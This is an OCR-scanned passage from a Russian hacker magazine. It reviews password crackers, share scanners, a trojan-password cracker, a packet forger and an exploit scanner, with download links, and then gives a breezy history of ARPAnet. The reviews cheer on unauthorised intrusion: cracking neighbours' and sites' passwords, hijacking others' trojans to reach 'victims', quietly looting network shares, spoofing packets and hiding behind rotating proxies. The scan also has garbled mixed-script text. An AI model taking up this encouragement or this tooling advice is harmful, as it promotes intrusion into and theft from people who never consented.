пехом, и LOpht, невозмутимо пошуршав винчес- 
тером, выдаст тебе заветное сообщение “Crack 


complete”. На экране доступна статистика теку- 
щего перебора, и вид мерно сменяющихся цифр 
рождает чувство уверенности в себе, чему, кста- 
ти, немного помогает вращающийся логотип 
компании. Без регистрации программа работает 
15 дней, что не мешает за это время понять ее 
полезность и сбегать на асталависту. Размер ин- 
сталляционной версии равен 1Мб. 


Brutus 
http://hoobie.net/brutus/ 


Когда тебе наскучили все сетевые забавы, 
все пароли на винте уже давно взломаны, а 
новые все никак не хотят появляться, то 
появляется какое-то странное ощущение. Хо- 
чется чего-то, сам не знаешь чего. Сайты, что 
ли, повзламывать? Так сколько можно? Чужая 
почта уже давно стала хуже своей, и никако- 
го разнообразия не предвидится. И только 
Brutus поможет тебе разнообразить серые 
будни и сделает это в присущей ему манере, 
а именно даст тебе возможность перебирать 
пароли не только Ha WWW ресурсы и почту, 
но и с использованием многих других прото- 
колов. Теперь ты сможешь сломать свою лю- 
бимый MUD, поиздеваться над забывчивым 
соседом, который поставил себе Ме Ви$ и за- 
был на него пароль, и даже перебирать паро- 
ли на шары. В принципе, с помощью этой 
программы можно взломать все что угодно, 
даже замок на двери в ванную (если, конеч- 
но, ты сможешь описать программе исполь- 
зуемый замком протокол :)). Для тех, у кого 
на винте нет ни одного словаря, программа 
может сгенерировать свой, причем я бы посо- 
ветовал использовать эту возможность даже 
тем, кто собирается ломать пароли какой-ли- 
бо другой программой. Почему? Да потому что 


ты вряд ли где еще найдешь возможность соз- 
дать “мутирующий” словарь мегабайт так на 
50. А если у тебя уже есть готовые словари, 
то с помощью этой проги ты можешь поуда- 
лять из них дубликаты или преобразовать 
словарь для Unix в словарь для Windows. Лю- 
бители грубой физической силы теперь могут 
применять и брутфорс, который, кстати, у 
программы тоже получается достаточно неп- 
лохо. Для утилит такого рода Brutus достаточ- 
но молод, так как он был выпущен в начале 
Миллениума, и теперь становится понятно, с 
каким грузом мы входим в XXI век. Больше 
взломов, хороших и разных! 
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ный. Кстати, если ты нашел в сети машину, к 
которой получил доступ через шары, то так- 
же ты можешь подключить ее сетевой прин- 
тер и наконец-то утолить свою тягу к славе. 
Но я все же советую тебе не тратить время за- 
нятых людей и обеспечить их какой-нибудь 
полезной информацией. Можно, например, 
распечатать им список всех эксплоитов 
Windows на китайском языке. Тысячи на пол- 
торы строк списочек-то получится. И вообще 
- созидательные возможности ВЗх очень ве- 
лики. Ты ведь собираешься ее использовать 
исключительно в ознакомительных и созида- 
тельных целях? :) 
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Project R3x 


http://hackersclub.com/km/file 
s/hfiles/R3x060.zip 


Ты помнишь, что любая операционка на базе 
Windows в состоянии открыть доступ тебе к 
своим ресурсам. Что значит - “а если не 
даст?" А ты хорошо просил? В 139 порт загля- 
дывал? И что? Пароль? Я бы тоже не пытался, 
но... Такого сканера shared ресурсов ты еще 
не видел. Интерфейс, доступный даже мла- 
денцу. Да не твоему младенцу, он-то, навер- 
ное, кроме консоли Linux, ничего не приз- 
HaeT, а любому человеку, мало сведущему в 
компьютерах. Понятно, что к тебе это не от- 
носится, так как даже ты, заглянув в меню 
Опции, останешься сидеть на своей пятой 
точке. Сам посуди, программа относится к па- 
ролям лучше, чем ты к своему здоровью :), 
она их постоянно перебирает, высматривая, 
не убежал ли какой и почему он такой блед- 
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RatCracker 


http://hackersclub.com/kmifile 
s/password_cracker/rat- 
cracker 1.4.1.zip 


Тебе часто приходится пользоваться троянами, 
и все твои знакомые уже почему-то не берут от 
тебя дискеты? Услышав твой ник, люди в Сети 
панически отключаются? Ты, наверное, заме- 
чал, что находить новых жертв с каждым ра- 
зом все сложнее и сложнее. Из этой ситуации 
есть два выхода (естественно, выход ногами 
вперед я не рассматриваю). Ты можешь прос- 
то забить на все это дело, читать в сети кули- 
нарные рецепты и рассматривать журналы 
мод, а можешь поступить как настоящий хац- 
кер и воспользоваться плодами чужого труда. 
Итак, наверняка ты сталкивался с машинами, 
на которых уже были установлены трояны, но, 
К сожалению, они были запаролены, и все 
твои попытки пробиться внутрь не увенчались 
успехом. Желание сломать шею “тому парню”, 
конечно, понятно, но, поверь, значительно 
лучше оставить его в дураках, взломав пароль. 
А в этом тебе поможет RatCracker, который в 
состоянии ломать пароли таких известных 
троянов, как DeepThroat, Sub7 и NetBUS. A 
всего в списке поддерживаемых троянов 10 
наименований. Но на этом его возможности не 
заканчиваются. Помимо этого, с его помощью 
ты можешь флудить компьютеры и сканиро- 
вать открытые порты в сетях. Возможность ав- 
томатического обновления программы помо- 
жет тебе всегда оставаться самым продвину- 
тым в современные технологии, главное - не 
утонуть в них совсем. Кстати, в программу 
встроена возможность перехвата ссылок из бу- 
фера обмена, что приго- 
дится тем, кто использует 
для скачивания файлов ка- 
кие-то другие программы, 
кроме браузера. А и еще 
хотелось бы остановиться 
на интерфейсе этой прог- 
раммы. Он бесподобен. От 
стандартного Windows ин- 
терфейса не осталось ни- 
чего, ну кроме, может 
быть, квадратного окошка. 
Это единственное, что на- 
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помнит тебе о Билле Гей- 
Tce, так как остальное 
очень напоминает интер- 
фейс главного экрана ка- 
кого-нибудь космического 
корабля четвертого тыся- 
челетия. Распространяется 
RatCracker бесплатно и, 
кстати, не требует инстал- 
ляции. Размер в архиве 
106K6. 
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проконсультировав- 
шись с CrackWhore, 
можешь гордо отве- 
тить: “405. Сам ду- 
pak”. Это уже будет 
зависеть от цели 


RAT Cracker 1.4.0 Help x 
Crack that RAT! 
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Data Window 


твоего визита Ha уда- 


© Deep Throat 2.1 

© Deep Throat 3.x 

© Deep Throat Secure 
© Deep Throat MiB's 
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О SubSeven = 1.9 
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Crack Whore 
http://www.subreality.net/ 


Просыпаешься ты утром, потягиваешься, вклю- 
чаешь компьютер и никак не можешь решить, 
чем бы тебе сегодня заняться. А пальцы уже 
привычно бегают по клавиатуре, проверяя поч- 
ту, подключаясь к троянам, и вот ты в очеред- 
ной раз заходишь на свой любимый порносер- 
вер и вдруг обнаруживаешь, что тебе предла- 
гают зарегистрироваться. О ужас, они меняют 
регистрацию на деньги. Как назло, под рукой 
нет любимого сгенерированного номера кредит- 
ки, и ты, вычурно выразившись об их сайте и 
сказав зачем-то пару слов о матери Билла Гей- 
тса, уходишь. А ведь этого бы не произошло, ес- 
ли бы у тебя была программа Crack Whore, пред- 
назначенная для перебора паролей именно на 
такие сайты. Почему именно на такие? Да пото- 
му что в базе уже собранных программой паро- 
лей есть пара адресов сайтов с паролями на них. 
Некоторые из них еще работают, так что тебе 
стоит поторопиться. А вот если ты решил самос- 
тоятельно получить доступ к любимому серверу, 
то послушай, какие возможности прога для это- 
го предоставляет. Ты можешь одновременно пе- 
ребирать несколько паролей, автоматически от- 
ключаться через заданный промежуток времени 
и даже использовать несколько разных прокси. 
Кстати, для того чтобы так и остаться аноним- 
HbIM B3/IOMLUMKOM, а не читать потом о своих под- 
вигах на всех крупных хакерских сайтах, ты мо- 
жешь менять используемый прокси через каж- 
дые несколько попыток. В программу также 
встроены ехр/о-сканер и возможность общения 
через IRC, так сказать, не отходя от кассы. Кста- 
ти, помимо достаточно неплохой документации, 
доступной на сайте, в программе есть неплохой 
справочник для расшифровки кодов ошибок. И 
теперь на сообщение сайта “Ошибка 404” ты, 
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ленный сайт. В 06- 
щем, единственное, 
что могло бы тебя от- 
влечь от использова- 
ния этой программы, 
- так это то, что ее 
размер в архиве сос- 
тавляет 3.84M6, что, 
впрочем, еще доста- 
точно мало для про- 
ги, написанной на... 
VisualBasic’e =). 
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но эта фраза может быть применена к проце- 
дуре перебора паролей Женькой Риппером, 
ну или LOpht Сгаскег’ом. И если тебе сначала 
кажется, что цифры бегают очень быстро, то 
через несколько часов ты понимаешь, что 
твой четвертый пень давно пора выбрасы- 
вать на свалку и брать что-нибудь пошус- 
трее. “Как, неужели ты не смог перебрать все 
восьмизначные комбинации, состоящие из 
букв и спец. символов? А моя тачка за неде- 
лю справилась”, - говорят тебе друзья. 
Пришло время и на нашей улице перевернуть 
самосвал с анашой, и поэтому сегодня мы бу- 
дем учиться использовать программу VCU. Ha 
первый взгляд, кажется, что проку от нее не 
очень много, но первое впечатление обман- 
чиво. Ведь значительно проще и быстрее пе- 
ребрать пару тысяч паролей из словаря, чем 
ждать пока полный перебор дойдет до завет- 
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“Бывают минуты, когда дело решают секун- 
ды, и они длятся годами”. В принципе, имен- 


Г Password can't be same as username 


Free Software 

Visual Basic Source 
Visual Basic Tutorials 
Visual Basic Books 
Messaqeboard 


Real-time info 


ных шести- или восьмисимвольных паролей. 
А вот возможностей для работы с wordlist’om 
у программы более чем предостаточно. Гене- 
рация случайных паролей, преобразование 
текстовых файлов в отсортированные по ал- 
фавиту словари, изменение регистра, слия- 
ние файлом с удалением дубликатов и еще 
многое многое другое. Тебе, я думаю, понра- 


вится возможность из любого файла сделать 
файл с паролями. Чем она замечательна? А 
тем, что ты просто получаешь список всех 
слов выбранного документа, причем слова 
не повторяются. Интересно бывает почитать 
уже получившийся текстовичок. Но смотри, 
чтобы там были еще хоть какие-нибудь сло- 
ва, кроме “хакинг” и “пиво”. А-а, ты скормил 
проге свое последнее письмо другу-хакеру? 
Тогда неудивительно. Для любителей кон- 
сольных взломщиков паролей предусмотрен 
графический интерфейс для их запуска с ку- 
чей возможностей. Поддерживаются John 
The Ripper версий 1.0 и 1.6, Brute 1.1 и ХТ 
2.0. С программой поставляется очень под- 
робная документация по используемым воз- 
можностям, причем она доступна как в тек- 
стовом, так и в НТМЁ-вариантах. Распростра- 
няется VCU точно так же, как сыр в мыше- 
ловках, то есть совершенно бесплатно. Раз- 
мер инсталляционной версии 274 Кб. 


Winlnject 


http://hackersclub.com/kmifile 
s/hfiles/winject.zip 


Тебе часто попадаются эксплоиты, но, к CO- 
жалению, программировать ты не умеешь? 
А так хотелось хоть раз выполнить какой- 
нибудь простенький Denial of Service, ну 
или переполнение буфера... Не вечно же 
тебе только свою машину вешать :). Если 
ты что-то слышал про пакеты в Сети и хо- 
тел бы понять, что это такое и как можно 
послать кому-нибудь такой пакет, то 
WinInject - это программа для тебя. Она 
предназначена для того, чтобы создавать 
собственные пакеты и посылать их в Сеть. 
Теперь ты имеешь полный доступ к тому, 
что отсылается с твоей машины, и потому 
вполне можешь в качестве обратных адре- 
сов указывать соседские, кстати, как и в 
адресе получателя тоже :). С программой 
поставляются примеры некоторых пакетов, 


в частности пинга и DNS запроса, так что ты 
вполне можешь научиться с ними работать 
и на низком уровне. Настройка программы 
достаточно проста, требуется лишь указать 
используемый порт для связи с Интернетом 
и скорость передачи данных. Сразу же мохж- 
но протестировать выбранные настройки, 
но для этого надо находиться в режиме 
online. Итак, ты все же пробрался через та- 
кие дебри настройки, и у тебя уже чешутся 
руки заслать этот пакет куда-нибудь по- 
дальше? Тогда тебе придется еще немного 
помучиться и почитать документацию, кото- 
рая здесь написана очень понятным ан- 
глийским языком. Автор считает программу 
бета-версией, но на самом деле по разнооб- 
разию возможностей она не уступает неко- 
торым полнофункциональным продуктам. 
Ты можешь сохранять созданные пакеты, 
причем их последующее редактирование 
можно осуществлять в любом текстовом ре- 
дакторе. В этой вер- 
сии WinInject добави- 
лась возможность 
включения так назы- 
ваемых “псевдозаго- 
ловков”, то есть по- 
лей, для которых 
программа сама под- 
считывает контроль- 
ную сумму. Не удив- 
ляйся, если что-то те- 
бе вдруг станет непо- 
нятно, так как ис- 
пользование Сети на 
таком низком уровне 
не такая уж и простая 
штука. Это тебе не 
шары подключать. Но 
зато, уж если ты научишься пользоваться 
этими возможностями, то преград для тебя 
точно существовать не будет. Кстати, из 
представленных в обзоре программ она са- 
мая маленькая, всего 25 Кб, но то, что ты с 
ее помощью сможешь сделать много инте- 
ресного, я тебе обещаю. 


в МЕСТ vil Sith 
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SMBScanner 


http://uc2.newmail.ru/skan- 
ners.htm 


О зашаренных ресурсах уже давно говорят, 
пишут и много спорят. А те, кому спорить не- 
когда, берут старый добрый SMBScanner, 
подключают с его помощью ресурсы других 
машин, тихо выносят оттуда все что им инте- 
ресно и, незамеченные, отправляются вос- 
вояси. И пусть скорость работы этой прог- 
раммы иногда оставляет желать лучшего, но 
пока она остается одной из самых популяр- 
ных программ такого рода. Сканеры шаров, 
вообще-то, никогда не отличались особым 
дизайном, но в данном случае это с лихвой 
компенсируется простотой и удобством в ра- 
боте. Хотя работой это назвать сложно, так 
как все происходит настолько просто и без- 
болезненно, что пациент даже пикнуть не ус- 
певает. Разве что принтером, который 
SMBScanner тоже в состоянии подключать, и 
теперь ты можешь насладиться качеством пе- 
чати настоящего лазерного принтера. А что? 
Позвонишь ты в фирму и скажешь: “Здрав- 
ствуйте, у вас сегодня принтер ничего с утра 
не распечатал? Когда я могу забрать?". :) Ра- 
бота с этим сканером проста до безобразия. 
И хотелось бы что-то усложнить, да нечего. 
Вводишь начальный и конечный IP адреса и 
затем давишь на кнопочку “Scan”. Остальное 
SMB сделает сам. Как только он обнаружит в 
сети зашаренную машину, то автоматически 
подключит все доступные ресурсы и будет 
ждать твоих дальнейших указаний. А я уве- 
рен, они последуют, так как фантазия у тебя 
бурная, да и информация ждать не любит. Ты 
меня еще слышишь? Ну вот, я так и знал, ты 
убежал к компу и... Что такое? Мой принтер 
выдает горы бумаги с красивыми цветными 
картинками? А по телефону звонят и спраши- 
вают, когда их можно забрать? Да, да, сейчас 
открою... И, пока я еще не убежал, скажу, 
что программа бесплатная и размер у нее 468 
Кб. 
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VoidEye СС! scanner 


http://www.void.ru 


Проходя мимо бочки с пивом, ты вдруг заме- 
чаешь, что у нее есть еще один кран, который 
почему-то не заперт на замок. Быстро подхо- 
дишь, открываешь его, наполняешь пивом ту 
тару, которая всегда с собой (то есть ту, в ко- 
торую ты ешь), а затем быстро закрываешь 
кран и уходишь. На следующее утро бочка 
уже пуста, а рядом прохаживаются твои зна- 
комые с довольными лицами. И ты пытаешься 
вспомнить, а не видел ли я такую бочку рань- 
ше и не пойти ли опустошить и ее? Если 
вспомнишь, то иди, а я лишь скажу, что в Се- 
ти с обнаружением таких вот лазеек и 
эксплоитов значительно проще. Куча народу 
только тем и занимается, что высматривает, 
где бы перелезть через забор, даже если ря- 
дом есть калитка. Найденные эксплоиты тща- 
тельно сортируются, наверное, для лучшей 
сохранности, и выкладываются на специаль- 
ные сайты. И вот оттуда их можно взять, а по- 
том скормить одному из самых лучших рос- 
сийских сканеров VoidEye. Он, по-моему, 
единственный из программ такого рода, обла- 
дает настолько оригинальным интерфейсом, 
что даже главное окно выполнено то ли в 
форме яйца Фаберже, то ли в форме овально- 
го зеркала. Программа поддерживает скины, 
так что, я думаю, ее интерфейс тебе не скоро 
надоест. А впрочем, причем тут интерфейс, 
если программа уже укомплектована 119 
эксплоитами и позволяет тебе добавлять все 
новые и новые, Они, кстати, регулярно появ- 
ляются на сайте производителя. Сканер может 
работать через прокси, сканировать по диапа- 
зону IP адресов или перебирать серверы из 
списка, в котором по умолчанию почему-то 


стоит www.microsoft.com :). После обнаруже- 
ния уязвимого сервера стоит поискать в Сети 
информацию по использованию уязвимости, а 
можно дождаться выхода следующей версии, 
в которой появится возможность использовать 
эксплоиты автоматически. Размер программы 
328 Кб. Сайт производителя полностью на 
русском языке. Удачи тебе в поисках! 


X-Scanner м0.7 


http://web.brotherhood.com 


С чего начинается твое утро в Сети? Понятно, 
что утро - это понятие растяжимое, и у некото- 
рых оно переходит в ночь как раз тогда, когда 
первые петухи еще спят, а некоторые люди 
уже тянутся на работу, но все же? С просмот- 
ра почты или проверки любимого держателя 
троянского коня? Мое утро в Сети начинается 
с вечера, но состоит в том, что я сканирую 
подсеть провайдера и смотрю, не появилось ли 
там чего интересного. И, знаешь, иногда появ- 
ляется. А вот для того, чтобы это делать, я ис- 
пользую Х-бсаппег неприхотливый и очень 
удобный сканер портов. Удобство его заклю- 
чается в том, что он сканирует и выводит мне 
адреса тех машин, на которых установлены 
BackOrifice, NetBUS, ЕТРшники или НТТРшни- 
ки. И делает он это настолько быстро, что уже 
после нескольких минут я знаю, что Вася Пуп- 
кин сегодня не в Сети, так как NetBus’omM ник- 
то не заражен, а вот какой-то новичок актив- 
но занимается серфингом, причем настолько 
активно, что даже шары забыл отключить. 
Сканирование можно осуществлять как по 
диапазону [Р-адресов, так и по списку из фай- 
ла. Кроме того, программа осведомлена о не- 
которых дырках в используемых сервисах, и 
поэтому даже простой открытый http-nopT мо- 
жет многое рассказать о владельце машины. 
Если тебя интересуют только компьютеры, в 
которые можно проникнуть, то в настройках 
программы можно об этом попросить, и, если 
ты будешь достаточно вежлив, то получишь 
список уязвимых компьютеров указанной под- 
сети. Программа не требует инсталляции и 
распространяется абсолютно бесплатно, что, 
впрочем, для такой маленькой программы и не 
удивительно. Размер в архиве 162 Кб. 


Essential Net Tools 


http://www.tamos.com 


Редко в Сети встретишь по-настоящему полез- 
ные наборы утилит. Чаще попадаются несовмес- 
тимые вещи в одной программе, причем ужасный 
интерфейс не дает понять, действительно ли те- 
бе это надо и, вообще, зачем ты скачивал эти 
50Мб из Сети. К счастью, это не относится к 
Essential Net Tools - программе, которая в одном 
флаконе предоставляет очень большое количес- 
тво возможностей. Среди них можно отметить 
сканер shared-pecypcos, NATShell, утилиту для 
мониторинга текущих соединений и возможность 
из Windows 95/98 использовать расширенные 
возможности WinNT в управлении шарами. Такая 
программа очень понравится твоей девушке, так 
как с ее помощью ты сможешь показать свою 
настоящую крутость, и брошенная мимоходом 
фраза типа “а сейчас мы отправим ТСР - запрос 
напрямую” ее просто покорит. Для тех, кто в 
этом что-то понимает, скажу что в программу 
встроен сканер LMHosts, и есть возможность по- 
сылать DNS запросы. Но и в том случае, если ты 
будешь использовать только часть возможностей 
- например, подключать шары или смотреть на 
текущие соединения, чувство уверенности в се- 
бе и в этой программе тебя не покинет. Програм- 
ма распространяется как shareware, но не огра- 
ничена по времени использования, поэтому в 
связи с этим никаких неудобств возникнуть не 
должно. ЕМТ обладает развернутым файлом 
справки, и именно там ты можешь прочитать о 
всех, в том числе и скрытых, возможностях прог- 
раммы. Размер инсталляционной версии 917 Кб. 


DABHO БЫЛО 


ARPAnet. 
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С чЕГО всЕ начиналось... 


NOAH (NOAH@INBOX.RU, UIN 983332) 


казывается, у холодной войны TO- 
О же могут быть свои плюсы... Если 
хорошенько поразмыслить - полу- 


чается так, что именно холодная война, поде- 
лившая все человечество на две части, отго- 


родившая их друг от друга железным занаве- 
сом, в итоге породила то, что позволяет нам 
сейчас свободно общаться на любые темы с 


Вспомни, что на дворе 69-ый год: холодная вой- 
на, гонка вооружений, перспективными счи- 
таются только военные и космические техноло- 
гии, а тут вдруг сеть какая-то... Заметь еще 
один интересный факт: сеть получила название 
ARPAnet, а агентство, построившее ее, называ- 
лось DARPA. Куда подевалась первая буква “О”? 


людьми из разных концов планеты, беспре- 
пятственно получать любую информацию о 
чем угодно (ну, допустим, не совсем любую, 
но... не будем придираться к словам). Я имею 
в виду Internet. А начиналось все с ARPAnet... 


DoD 


В 1969 году, по инициативе Пентагона, 
Агентство Перспективных Исследований 
министерства обороны США (DARPA - 
Defense Advanced Research Projects Agency) 
начало строительство глобальной компью- 
терной сети, которая получила название 
ARPAnet (Advanced Research Projects Agency 
Network - сеть Агентства Перспективных 
Исследований), и была призвана объеди- 
нить между собой локальные сети несколь- 
ких американских университетов, научных 
лабораторий и военных баз. Спрашивается, 
чем могли заинтересоваться в процессе 
прокладывания глобальных сетей сугубо 
военные ведомства США? Вспомни, что на 
дворе 69 год: холодная война, гонка воору- 
жений, перспективными считаются только 
военные и космические технологии, а тут 
вдруг сеть какая-то... Заметь еще один ин- 
тересный факт: сеть получила название 
ARPAnet, а агентство, построившее ее, на- 
зывалось DARPA. Куда подевалась первая 
буква “0”? “Пустяк!” - скажешь ты. А если 
призадуматься? Соль в том, что изначально 
это агентство называлось ARPA, а букву “О” 
к нему прибавили только после того, как 
оно было подмято под себя министерством 
обороны (DoD - Department of Defence of 
USA; defense - оборонный). Просматривает- 
ся явное неравнодушие Пентагона к сете- 
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По душу каждого Tako- 
го вычислительного 
центра имелась персо- 
нальная, я бы даже ска- 
зал, именная ракета :). 
Так что в случае войны 
полдюжины выпущен- 
ных межконтиненталь- 
ных ракет - и противник 
остается без своих 
планов и расчетов. 


вым технологиям, Все-таки, почему? Это мы 
сейчас и выясним. 


ДЕТИЩЕ ХОЛОДНОЙ 
BOWHbI 


В Te далекие времена, когда наши с тобой po- 
дители хорошо умели только хачить свои пог- 
ремушки и ходить пешком под стол, компы 
еще не были так широко доступны простым 
смертным, зато военные уже юзали их на всю 
катушку. Хранили там всякую свою секрет- 
ную информацию, архивы, проводили какие- 
то вычисления, управляли спутниками и ра- 
кетами. Времена были другие, люди были 
проще, Нудно тянулась холодная война, все 
время норовя перерасти в горячую. И у на- 
ших, и у америкосов были свои идеи (планы) 
о том, как, в случае острой необходимости, 
наиболее легким и непринужденным спосо- 
бом сравнять с землей противника. Вся ин- 
формация такого рода хранилась на компах, 
которые, в свою очередь, хранились в огром- 
ных суперсекретных вычислительных цен- 
трах (так называемые ВЦ). Как правило, это 
были огромные институты и лаборатории, 
нашпигованные аппаратурой по самые уши. 
Но, как я уже сказал, времена были другие, и 
люди были проще. Разведывательные службы 
работали отлично, так что и нашим, и их 
военным хорошо было известно, у кого и где 
находятся эти ВЦ и подо что они замаскиро- 
ваны (например, под общественный сортир, 
расположенный на каком-нибудь богом забы- 
том пустыре, где не то что человек с мятой га- 
зеткой - и собака бродячая не появляется :)). 
Но никто и не задумывался о том, чтобы хак- 
нуть или подсадить шпиона в такой ВЦ - вре- 
мена-то были другие, да и люди были попро- 
ще. По душу каждого такого вычислительного 
центра имелась персональная, я бы даже ска- 
зал, именная ракета :). Так что в случае вой- 
ны полдюжины выпущенных межконтинен- 
тальных ракет, и противник остается без 
своих планов и расчетов. А времена-то были 
еще и стремные. Поэтому америкосы приня- 
лись усердно шевелить лбами и придумали- 
таки, бесы, простой и гениальный способ 
выйти из положения: зачем держать все ком- 


пы в одном месте, подвергая их опасности, 
если можно растащить, распределить их по 
территории всей страны, объединив в огром- 
ную сеть. Тогда для их уничтожения уже ни- 
каких ракет не напасешься. Кроме того, эти 
хитрецы решили пустить в свою сеть некото- 
рое количество учебных, научных и исследо- 
вательских заведений для того чтобы те, во- 
первых, могли эффективно продолжать свои 
исследования, а, во-вторых, чтобы переме- 
шать свои военные компы с гражданскими: 
поди потом разбери, что стоит бомбить, а что 
- нет. Если бы не этот последний факт, Инета 
сейчас бы не было :). 


ПЕРВЫЕ ШАГИ 


Не подумай, что ARPAnet была основной 
военной сетью США. Нет, просто финанси- 
руя ee, DoD провоцировала развитие се- 
тевых технологий (зачем, я уже рас- 
сказал). Таковы предпосылки соз- 
дания ARPAnet. Что x, давай Te- 

перь смотреть подробности. 
Началось все с того, что по 
заказу DARPA в BBN (Bolt, 
Baranek and Newman - фир- 
ма-разработчик из Кембрид- 
жа) начали разработку ус- 
тройств IMP (Interface 
Message Processor), в задачу 
которых входило обеспечить 
связь между компами через 
телефонную сеть. Работы над 
первым IMP (модель Honywell 
516) велись весной 69-го, и 
уже к 1 сентября одно такое 
устройство было доставлено в 
Калифорнийский университет 
в Лос-Анджелесе (UCLA) (еще 
одно 1МР-устройство было в 
самом ВВМ, но оно пока рабо- 
тало нестабильно). Студенты 
этого универа сразу взялись 
писать сетевой протокол, с 
помощью которого должны 
были подключить машины 
Sigma-7 к IMP. В октябре того 
же 69-го второе устройство 
IMP было доставлено в другое 
заведение - в исследо- 
вательский цент 
Стэндфор- 


ДСКОГО _— 
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университета (SRI). Именно между этими дву- 
мя узлами будущей ARPAnet было передано 
первое сообщение: с UCLA на SRI (расстояние 
- 500 км). Как утверждает история, это были 
символы “L”, “G" и “О”. 1 ноября и 1 декабря 
два 1МР-устройства были установлены в Ка- 
лифорнийском университете Санта-Барбары 
(UCSB) и в Университете штата Юта (UTAH). 
ARPAnet уже насчитывала пять узлов. К лету 
70-го свои 1МР уже получили: Массачусет- 
ский технологический институт (MIT - 
Massachusetts Institute of Technology), корпо- 
рации RAND Corp. и System Development 
Corp. и Гарвардский университет (Harvard). 
Вот тебе уже целых десять узлов - сетка рас- 
тет :). 


ПОДОПЫТНЫЕ СЕТИ 


Как я уже отмечал, тот факт, что в сеть были 
допущены невоенные организации, сыграл 
огромную роль в ее развитии. На протяжении 
всей своей истории ARPAnet была подопыт- 
ным кроликом. Чего только с ней не делали: 
перепробовали чудовищное количество вся- 
ких протоколов, подключали различные ма- 
шины, разрабатывали способы адресации в 
сети и вытворяли прочие нехорошие вещи. 
Параллельно с этим ARPAnet стала всеобщей 
любимицей: всем нравилась та оперативность 
и простота, с которыми осуществлялись ком- 
муникации в сети: почта, передача файлов, 
удаленное подключение. Постепенно все 
большее и большее количество гражданских 
объектов подключалось к сети. Сеть “одомаш- 
нивалась” гражданскими. Особо бурную дея- 
тельность развели студенты. Их разработки 
стали прародителями современных чатов, 
конференций и других развлекалок. 

В 1975 году управление ARPAnet в некотором 
смысле было передано Оборонному Коммуни- 
кационному Агентству США (DCA - Defense 
Communications Agency). Тем не менее, 
DARPA продолжало заниматься техническими 
аспектами ARPAnet. В то время DARPA (и не 
только они) усиленно работало над разработ- 
кой межсетевых протоколов, так как РР-про- 
токолы (Point-to-Point - протоколы типа Точ- 
ка-Точка) уже не могли обеспечивать под- 
ключения такого большого количества раз- 
личных по структуре локальных сетей, же- 
лающих подключиться к ARPAnet. И к 1980 
году общими усилиями был оформлен стан- 
дарт протоколов: TCP/IP. ARPAnet сразу нача- 
ла переходить на новый стандарт. Хотя “пе- 
реходить” - не совсем правильное слово, так 
как при разработке ТСРЛР его тестировали, в 
том числе и на ARPAnet - следовательно, 
ARPAnet уже давно использовала протоколы 
из TCP/IP. Вернее будет сказать, DARPA нача- 
ло заставлять присоединенные к ARPAnet ло- 
кальные сети переходить на TCP/IP. 


ПРОГРУЗИМСЯ?! 


Эй, дружище, чего-то ты разбряк, припух как- 
то, заскучал. Может тебя взбодрить немного 
ударной порцией технических подробностей 
реализации ARPAnet? Да, я думаю, пора :). Как 
ты уже знаешь, скелетом ARPAnet являлись 
соединенные между собой 1МР-узлы. С тече- 
нием времени 1МР-узлы были переименованы 
в Р5М-узлы (узлы коммутации пакетов). Да и 
само оборудование, представляющее собой 
эти устройства IMP/PSN, было модернизирова- 
но. Эти самые Р5№-узлы связаны между собой 
каналами связи типа точка-точка. Причем, 
связаны они так, чтобы каждый PSN-y3en 
имел, как минимум, два канала связи с двумя 
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Ha протяжении всей своей истории ARPAnet бы- 
ла подопытным кроликом. Чего только с ней не 
делали: перепробовали чудовищное количество 
всяких протоколов, подключали различные ма- 
шины, разрабатывали способы адресации в се- 
ти и вытворяли прочие нехорошие вещи. 


разными Р$№-узлами. При таком раскладе, ес- 
ли полетит один канал связи или один PSN- 
узел, связь в сети ARPAnet не будет нарушена, 
так как другие Р$М-узлы смогут отправить 
свои пакеты в обход аварийного участка. Каж- 
дый PSN-y3en укомплектован двадцатью двумя 
внешними портами, к которым можно подклю- 
чать клиентские машины. Машина, подклю- 
ченная к порту Р5№-узла, называется хостом. 
Обмен данными между хостом и PSN-y3nom 
происходит по протоколу Х.25 (во времена мо- 
лодости ARPAnet там юзался протокол 1822, 
который потом устарел). 

Для идентификации машины в сети ARPAnet 
использовалась следующая схема адресации: 
каждый PSN-y3en получает свой уникальный 
номер, а так как каждый порт PSN-y3na тоже 
имеет конкретный номер, получается, что ад- 
рес конечного получателя - хост-машины - 
состоит из двух чисел: номера Р5№-узла и но- 
мера порта, к которому подключена эта хост- 
машина. 


БОГАТЫЙ НА СОБЫТИЯ 83- 
ИИ... 


В 1983 году произошло сразу несколько при- 
мечательных событий в истории ARPAnet. Bo- 
первых, по решению DCA, ARPAnet была по- 
делена на две части: MILnet - чисто военная 
сеть, которая осталась в ведомстве ОСА и 
DoD, и ARPAnet, которую полностью отдали в 
распоряжение гражданских для исследова- 
ний. Так как ARPAnet уже вовсю работала на 
TCP/IP, поделить ее не составило никакого 
труда. Во-вторых, в DoD приняли постановле- 
ние об утверждении TCP/IP как основного на- 
бора протоколов для всех машин, подключен- 


дает чудовищное количество народу. 
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Первая поповина ЭО-ых 


Доступ в Инет становится общедоступным. О хакерах заговорили в широких кругах, о них 
начали писать в прессе. Снимают фильмы, где их почти всегда выставляют героями. Стара- 
ниями киношников образ хакера - тучного прыщавого очкарика - заменяется в сознании 
людей образом хакера - прогрессивного киберпанка. Слово “хакер” притягивает молодежь 
как магнит. Процветает крякерство. Фрикерство же, наоборот, на грани вымирания - за 
столько лет телефонные компании научились обеспечивать надежную защиту. К счастью, с 
изобретением сотовой связи фрикерство обрело второе дыхание :). Micro$oft буквально 
“впихивает” win на компы бедных юзеров - сначала оболочку, а потом и целую ось. От это- 
го крякерство и варез набирают еще большую популярность. Стараниями М$ в сеть попа- 


ных к глобальным сетям. 

Начался массовый переход Ha TCP/IP. Кроме 
ARPAnet на TCP/IP работали такие крупней- 
шие сети, как ВГТпе (the “Because Its Time 
Network”), CSnet (Computer Science Network), 
сеть NASA, NSFnet (National Scientific Fund 
Network), торговые сети, сети частных пред- 
приятий и другие крупные сети. Оказалось, 
что, в силу того, что все эти сети работают по 
протоколам TCP/IP, объединить их в одну ог- 
ромную сеть так же легко, как поделить лю- 
бую из них на произвольное количество час- 
тей. Было решено, что все объединяемые се- 
ти будут в обязательном порядке работать на 
TCP/IP, что их объединение будет проходить 
через специальные межсетевые шлюзы (gate- 
мау) и что для идентификации машин в этой 
сети будет разработана единая система адре- 
сации. Еще через несколько лет славная ис- 
тория ARPAnet закончилась, и началась уже 
другая история - история Internet. 


ГОТОВЬТЕ ПЕЛЕНКИ, МА- 
МАША! 


Таким вот образом буржуи... Хотя почему 
только буржуи? И я, иты, и буржуи, в общем, 
